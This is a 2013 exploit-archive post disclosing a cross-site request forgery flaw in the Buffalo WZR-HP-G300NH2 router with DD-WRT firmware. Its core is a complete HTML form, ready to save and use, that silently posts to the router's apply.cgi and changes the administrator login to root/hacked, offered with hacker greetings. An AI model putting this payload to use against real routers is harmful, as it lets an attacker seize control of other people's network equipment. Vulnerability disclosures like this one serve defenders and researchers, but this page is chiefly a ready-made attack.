exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Buffalo WZR-HP-G300NH2 Cross Site Request Forgery

Buffalo WZR-HP-G300NH2 Cross Site Request Forgery
Posted Jun 10, 2013
Authored by Prayas Kulshrestha

Buffalo WZR-HP-G300NH2 suffers from a cross site request forgery vulnerability. The demonstration payload changes the administrative password.

tags | exploit, csrf
SHA-256 | 356ff09e4efca2670f2e2f1a9ece0406305b5341ab44dff0237f4cf86e2c9419

Buffalo WZR-HP-G300NH2 Cross Site Request Forgery

Change Mirror Download
######################################################################
# Exploit Title: Buffalo WZR-HP-G300NH2 CSRF Vulnerability
# Author: Prayas Kulshrestha
# E-mail: officialnlsprayas@gmail.com
# Category: Hardware
# Google Dork: N/A
# Date: 06/10/2013
# Vendor: http://www.buffalotech.com
# Model: WZR-HP-G300NH2
# Firmware Version: DD-WRT v24SP2-MULTI (10/31/11) std - build 17798
# Product: http://www.buffalo-asia.com/hongkong/products/product_details.php?id=466&name=WZR-HP-G300NH2
# Tested on: Windows 7 (ultimate) 64-bit
######################################################################

#Introduction
==============
WZR-HP-G300NH2 is a high speed wireless LAN solution and complies with standard IEEE 802.11n 300 Mbps as well as High Power feature.
Wired LAN also supports the Gigabit Ethernet that no matter in the wired or wireless transmission,
WZR-HP-G300NH2 brings the high quality video era and realizes the comfortable wireless network environment.
Wireless Security Supports WPA2-PSK (AES, TKIP), WPA-PSK (AES, TKIP), 128/64-bit WEP and sets the wireless security of each level respectively.
USB2.0 port may be connected to Buffalo's USB external hard drive for network storage after simple setting.

#Description of Vulnerability
=============================
There is a CSRF vulnerability in the Buffalo WZR-HP-G300NH2 and any one easily change or manipulate the admin username and password. This is will POST request and any one can craft malicious html form with specially crafted POST request
to the router and on execution of the form the router's user name and password can be changed to anything.

#Exploit
========

<html>
<!-- Exploit Code by Prayas Kulshrestha -->
<body>
<h1>This is the PoC for the CSRF vulnerability in the buffalo router Powered by DD-WRT v24SP2-MULTI (10/31/11) std (SVN revision 17798)</h1>
<h2>click below to see the magic<h2>

<form action="http://192.168.1.1/apply.cgi" method="POST">
<input type="hidden" name="submit_button" value="Management" />
<input type="hidden" name="action" value="ApplyTake" />
<input type="hidden" name="change_action" value="" />
<input type="hidden" name="submit_type" value="" />
<input type="hidden" name="commit" value="1" />
<input type="hidden" name="PasswdModify" value="0" />
<input type="hidden" name="remote_mgt_https" value="0" />
<input type="hidden" name="http_enable" value="1" />
<input type="hidden" name="info_passwd" value="0" />
<input type="hidden" name="https_enable" value="0" />
<input type="hidden" name="http_username" value="root" />
<input type="hidden" name="http_passwd" value="hacked" />
<input type="hidden" name="http_passwdConfirm" value="hacked" />
<input type="hidden" name="_http_enable" value="1" />
<input type="hidden" name="refresh_time" value="3" />
<input type="hidden" name="status_auth" value="1" />
<input type="hidden" name="maskmac" value="1" />
<input type="hidden" name="remote_management" value="0" />
<input type="hidden" name="remote_mgt_ssh" value="0" />
<input type="hidden" name="remote_mgt_telnet" value="0" />
<input type="hidden" name="remote_ip_any" value="1" />
<input type="hidden" name="remote_ip" value="4" />
<input type="hidden" name="remote_ip_0" value="0" />
<input type="hidden" name="remote_ip_1" value="0" />
<input type="hidden" name="remote_ip_2" value="0" />
<input type="hidden" name="remote_ip_3" value="0" />
<input type="hidden" name="remote_ip_4" value="0" />
<input type="hidden" name="boot_wait" value="on" />
<input type="hidden" name="cron_enable" value="1" />
<input type="hidden" name="cron_jobs" value="" />
<input type="hidden" name="nas_enable" value="1" />
<input type="hidden" name="resetbutton_enable" value="1" />
<input type="hidden" name="zebra_enable" value="1" />
<input type="hidden" name="ipv6_enable0" value="0" />
<input type="hidden" name="radvd_enable" value="0" />
<input type="hidden" name="radvd_conf" value="" />
<input type="hidden" name="enable_jffs2" value="0" />
<input type="hidden" name="clean_jffs2" value="0" />
<input type="hidden" name="language" value="english" />
<input type="hidden" name="tcp_congestion_control" value="vegas" />
<input type="hidden" name="ip_conntrack_max" value="4096" />
<input type="hidden" name="ip_conntrack_tcp_timeouts" value="3600" />
<input type="hidden" name="ip_conntrack_udp_timeouts" value="120" />
<input type="hidden" name="samba_mount" value="0" />
<input type="hidden" name="samba_share" value="//yourserverip/yourshare" />
<input type="hidden" name="samba_user" value="username/computer" />
<input type="hidden" name="samba_password" value="iwer573495u7340" />
<input type="hidden" name="samba_script" value="yourscript" />
<input type="submit" value="Owned !" />
</form>
</body>
</html>


==========
Save this as anything.htm and this will change the router's user name and password.
username:root
password:hacked

#Greetz to : All Indian Hackers.
Login or Register to add favorites

File Archive:

November 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    16 Files
  • 2
    Nov 2nd
    17 Files
  • 3
    Nov 3rd
    17 Files
  • 4
    Nov 4th
    11 Files
  • 5
    Nov 5th
    0 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    3 Files
  • 8
    Nov 8th
    59 Files
  • 9
    Nov 9th
    12 Files
  • 10
    Nov 10th
    6 Files
  • 11
    Nov 11th
    11 Files
  • 12
    Nov 12th
    1 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    9 Files
  • 15
    Nov 15th
    33 Files
  • 16
    Nov 16th
    53 Files
  • 17
    Nov 17th
    11 Files
  • 18
    Nov 18th
    14 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    26 Files
  • 22
    Nov 22nd
    22 Files
  • 23
    Nov 23rd
    10 Files
  • 24
    Nov 24th
    9 Files
  • 25
    Nov 25th
    11 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    20 Files
  • 29
    Nov 29th
    9 Files
  • 30
    Nov 30th
    21 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close